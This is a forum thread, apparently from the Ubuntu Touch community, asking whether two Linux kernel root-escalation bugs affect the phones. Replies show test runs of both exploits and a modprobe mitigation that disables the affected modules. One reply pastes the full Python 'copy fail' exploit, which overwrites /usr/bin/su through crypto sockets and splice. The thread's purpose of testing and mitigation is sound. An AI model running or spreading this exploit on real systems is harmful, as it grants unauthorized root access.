UT kernel security question

tidip

Hello,

hopefully I am in the right section... I am just wondering how are kernel security issues handled in UT. Let's take as an example the 2 last ones (dirty frag and copy fail). Is it the responsibility of the maintainer(s) of the device to push a new kernel or some other group? How do I get such updates?

Thanks

Bolly

@tidip If I'm not mistaken, it's not possible to exploit those vulnerabilities on Ubuntu Touch since there's only one user.

gpatel-fr

@tidip

it all depends on the kernel, that is, on the specific port.

Here is what give the 2 exploits you are referencing to on my Fairphone 5 running UT 24.04-1.3

phablet@ubuntu-phablet:~$ python3 copyfail.py
Traceback (most recent call last):
  File "/home/phablet/copyfail.py", line 9, in <module>
    while i<len(e):c(f,i,e[i:i+4]);i+=4
                   ^^^^^^^^^^^^^^^
  File "/home/phablet/copyfail.py", line 5, in c
    a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
      ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/socket.py", line 233, in __init__
    _socket.socket.__init__(self, family, type, proto, fileno)
OSError: [Errno 97] Address family not supported by protocol
phablet@ubuntu-phablet:~$ cd Downloads/
phablet@ubuntu-phablet:~/Downloads$ gcc -O0 -Wall -o exp exp.c -lutil
phablet@ubuntu-phablet:~/Downloads$ ./exp
/usr/bin/su: 1: ELF: not found
/usr/bin/su: 1: cannot open : No such file
/usr/bin/su: 1: cannot open {�(��4[O+1� �z�~��]�5��m���l<����������E]�����E- ���Hp�: No such file
/usr/bin/su: 4: F�1� ���*F�B1� ���.F�b1� ���2F��1� ���6F��1� ���:F��1� ���>F��1� ���BF�2� ���FF�2�: not found
/usr/bin/su: 5: Syntax error: ")" unexpected
phablet@ubuntu-phablet:~/Downloads$ 

in short, no root shell, so not vulnerable without any mitigation. Don't ask me why, I don't know.

To anyone wanting to run this code: the dirtyfrag exploit can be had here

The python code to test the copyfail vuln is here:

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4

@bolly: getting root access from a software running as phablet allows the code to install system services, remount the root r/w and as such is preferrably avoided.

idonthatevests

@gpatel-fr
the second one looks like it successfully wrote something to su and tried to run it, but the su contents was misunderstood by OS
The mitigation should be the same as for desktop Linux: disabling affected modules completely in modprobe config:

install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
install algif_aead /bin/false